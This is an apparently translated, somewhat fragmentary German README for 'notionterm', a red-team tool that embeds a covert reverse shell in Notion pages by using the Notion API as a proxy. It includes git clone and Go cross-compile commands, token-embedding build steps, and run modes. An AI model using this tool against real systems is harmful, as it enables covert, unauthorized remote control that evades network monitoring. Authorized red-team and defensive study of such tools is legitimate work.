
Bette eine Reverse Shell in Notion-Seiten ein, indem die Notion-API als Proxy genutzt wird. Dies ermöglicht verdeckte Remote-Shell-Sitzungen mit verschlüsselter und authentifizierter Kommunikation für Red-Team-Operationen.

notionterm auf dem Ziel starten.
grob inspiriert von der großartigen Idee von OffensiveNotion und notionion!
Befehle und Flags zu lernen ist zu langweilig: Verwende wrap-notionterm.sh
notionterm und übertrage es auf die Zielmaschine (siehe Build)Es gibt 3 Hauptmöglichkeiten, notionterm auszuführen:
notionterm [flags]
ON, mache dein Reverse-Shell-Zeug, schalte OFF zum Pausieren, schalte ON zum Fortsetzen usw...
notionterm --server [flags]
CTRL+L um sie zu erhalten): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light-Modus
notionterm light [flags]
Da notionterm darauf ausgelegt ist, auf der Zielmaschine ausgeführt zu werden, muss es entsprechend gebaut werden.
Setze daher die Umgebungsvariablen entsprechend den Zielanforderungen:
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
Du musst den API-Schlüssel und die Notion-Seiten-URL entweder mit Umgebungsvariablen (NOTION_TOKEN & NOTION_PAGE_URL) oder mit Flags (--token & --page-url) setzen.
Bette den Notion-Integrations-API-Token und die Notion-Seiten-URL direkt in die Binärdatei ein. ⚠️ Jeder mit Zugriff auf die Binärdatei kann den Token abrufen. Aus Sicherheitsgründen nicht teilen und nach Gebrauch entfernen.
Setze die entsprechenden Umgebungsvariablen:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
Und baue es:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS